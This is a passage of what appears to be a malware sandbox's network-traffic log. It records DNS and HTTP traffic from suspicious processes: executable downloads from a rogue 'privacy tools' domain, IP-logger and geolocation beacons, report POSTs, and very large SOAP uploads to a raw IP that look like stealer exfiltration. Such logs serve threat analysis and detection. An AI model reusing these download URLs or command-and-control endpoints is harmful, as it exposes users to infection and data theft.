                                                                                          Set-Cookie: PHPSESSID=ri1tnrpm73571gb0g190acdph6; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176300; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: acce61361a3dee677653fa2909f29530202335835c71031ba4dff50682ae5de8
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          privacytoolsforyoufree.xyz
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          privacytoolsforyoufree.xyz
                                                                                          IN A
                                                                                          Response
                                                                                          privacytoolsforyoufree.xyz
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://privacytoolsforyoufree.xyz/downloads/toolspab1.exe
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /downloads/toolspab1.exe HTTP/1.1
                                                                                          Host: privacytoolsforyoufree.xyz
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:51 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 291840
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:04:02 GMT
                                                                                          ETag: "47400-5c6b8c99a3836"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          1privacytoolsforyou.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          1privacytoolsforyou.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.profitabletrustednetwork.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.13
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.20
                                                                                          www.profitabletrustednetwork.com
                                                                                          IN A
                                                                                          192.243.59.12
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          google.vrthcobj.com
                                                                                          IN A
                                                                                          Response
                                                                                          google.vrthcobj.com
                                                                                          IN A
                                                                                          34.97.69.225
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          google.vrthcobj.com
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          google.vrthcobj.com
                                                                                          IN AAAA
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          uyg5wye.2ihsfa.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          uyg5wye.2ihsfa.com
                                                                                          IN A
                                                                                          Response
                                                                                          uyg5wye.2ihsfa.com
                                                                                          IN A
                                                                                          88.218.92.148
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=71657&key=a7eb4c09b8719e178840dd510bc96bef
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          POST /api/?sid=71657&key=a7eb4c09b8719e178840dd510bc96bef HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/18hh57
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:05:03 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=da889t3kd8cnrgrlutemr5qm96; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253176288; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          13.71.61.154.in-addr.arpa
                                                                                          IN PTR
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:05:09 GMT
                                                                                          content-type: text/html
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: u_pl=14575867; expires=Sat, 10 Jul 2021 23:05:09 GMT
                                                                                          set-cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6NjAzNzY3LCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6Mzg5MTQsIm9uIjoiV2luZG93cyIsIm92IjoiMTAuMCIsImJpZCI6NjgwMDEsImJuIjoiRWRnZSIsImJ2IjoiMTUiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.552cZvC5zY6d-ELysi_3P64nQ7K_aGqASdomAgVqgg0; expires=Fri, 09 Jul 2021 23:06:09 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 6bf4bce6d2ba84358bbf9b56bdeed49c
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/e2q8zu9hu?shu=bdc0ee2b42df6a97b79289b43dabf78da95a8f3010db942836733be8431557d718899f20e5e280080874dd59123173fe409ccc6324d622d7826adc3fd96bc9422a6f1b45847aa68d8ba4a95fe2500b86979bc98e&pst=1625871969&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /e2q8zu9hu?shu=bdc0ee2b42df6a97b79289b43dabf78da95a8f3010db942836733be8431557d718899f20e5e280080874dd59123173fe409ccc6324d622d7826adc3fd96bc9422a6f1b45847aa68d8ba4a95fe2500b86979bc98e&pst=1625871969&rmtc=t&uuid=&pii=&in=false&key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          cookie: u_pl=14575867; cjs=t
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 0
                                                                                          location: https://trk.lemon-ade.site/go/9f5655c8-33b8-4e91-aa0b-2e057393cf74?sub_id=8ed2aa71fe299be10cfbe1eb71ba5b38&source_id=14575867
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: iprc6f0dd3656f17b3f31db0b5655db4a19d=2860867; expires=Sat, 10 Jul 2021 00:05:13 GMT
                                                                                          set-cookie: pdhtkv=true; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: uncs=1; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: pdhtkv28=true; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          set-cookie: uncs28=1; expires=Sat, 10 Jul 2021 23:05:13 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 6ab7677435604ca38ad871768fa0d681
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          x1.c.lencr.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          x1.c.lencr.org
                                                                                          IN A
                                                                                          Response
                                                                                          x1.c.lencr.org
                                                                                          IN CNAME
                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                          IN CNAME
                                                                                          e8652.dscx.akamaiedge.net
                                                                                          e8652.dscx.akamaiedge.net
                                                                                          IN A
                                                                                          104.73.131.204
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://x1.c.lencr.org/
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.73.131.204:80
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: x1.c.lencr.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Content-Type: application/pkix-crl
                                                                                          Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
                                                                                          ETag: "5f518b98-2cd"
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Sat, 10 Jul 2021 00:05:08 GMT
                                                                                          Date: Fri, 09 Jul 2021 23:05:08 GMT
                                                                                          Content-Length: 717
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:11 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 36
                                                                                          X-Rl: 43
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:12 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 35
                                                                                          X-Rl: 42
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:13 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 34
                                                                                          X-Rl: 41
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://ip-api.com/json/?fields=8198
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          208.95.112.1:80
                                                                                          Request
                                                                                          GET /json/?fields=8198 HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: ip-api.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Access-Control-Allow-Origin: *
                                                                                          X-Ttl: 33
                                                                                          X-Rl: 40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iw.gamegame.info
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          Response
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          104.21.21.221
                                                                                          iw.gamegame.info
                                                                                          IN A
                                                                                          172.67.200.215
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:12 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SWY1BNFntV9YCB5HkXHtYPP71vS3K7RBPE1s0kqeamJ0wAQ1%2FiH8zlDR%2BA4gANML2dES2Hn%2BOHoLd0ayBqESDwOzmZHdhvcujyoNs%2B9J3Jypx7Ze28qlHXI%2Bq90UlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5321a09f7011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 278
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:14 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=655yYNJ%2FuyOnZ8YzijNK%2F6rteNiUqNhjJK7wJZT9gvl%2BQiTTflR4i04Hdu%2BaT1HuE%2FstP7GQfMJFCLxdMkE9uqIqwZspsfmErN%2B4RpDb%2BAOG8s6VNO3otOtDIjelmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c532265918011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://iw.gamegame.info/report7.4.php
                                                                                          SystemNetworkService
                                                                                          Remote address:
                                                                                          104.21.21.221:80
                                                                                          Request
                                                                                          POST /report7.4.php HTTP/1.1
                                                                                          Accept: */*
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                          Host: iw.gamegame.info
                                                                                          Content-Length: 250
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8OJAjo21THl%2F8Hnmfx8XdmevX3XWx%2Btwsex2rxYKh55dmliAEWCdrGpVzXQa4r6GSPH02vE0TcrIf0mlnEAp5gQEpEYZ6xao0CUDN%2FkwYViDmt78%2Bk45sB%2BvJVsKug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c5322aeee9011d-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          venetrigni.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          Response
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          52.20.18.214
                                                                                          venetrigni.com
                                                                                          IN A
                                                                                          54.227.178.166
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://venetrigni.com/stats
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          52.20.18.214:443
                                                                                          Request
                                                                                          GET /stats HTTP/2.0
                                                                                          host: venetrigni.com
                                                                                          accept: */*
                                                                                          origin: https://www.profitabletrustednetwork.com
                                                                                          referer: https://www.profitabletrustednetwork.com/e2q8zu9hu?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14575867
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:15 GMT
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          content-length: 40
                                                                                          server: fasthttp
                                                                                          access-control-allow-origin: https://www.profitabletrustednetwork.com
                                                                                          access-control-allow-credentials: true
                                                                                          set-cookie: uid_id2=66ff1445-9781-4605-8aca-a61e6e9c1ef5:1:1; expires=Mon, 07 Jul 2031 23:05:15 GMT; secure; SameSite=None
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://185.53.46.82:3214/
                                                                                          1D88.exe
                                                                                          Remote address:
                                                                                          185.53.46.82:3214
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                          Host: 185.53.46.82:3214
                                                                                          Content-Length: 37256871
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 150
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:17 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://185.53.46.82:3214/
                                                                                          1D88.exe
                                                                                          Remote address:
                                                                                          185.53.46.82:3214
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 185.53.46.82:3214
                                                                                          Content-Length: 37256857
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:05:21 GMT
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
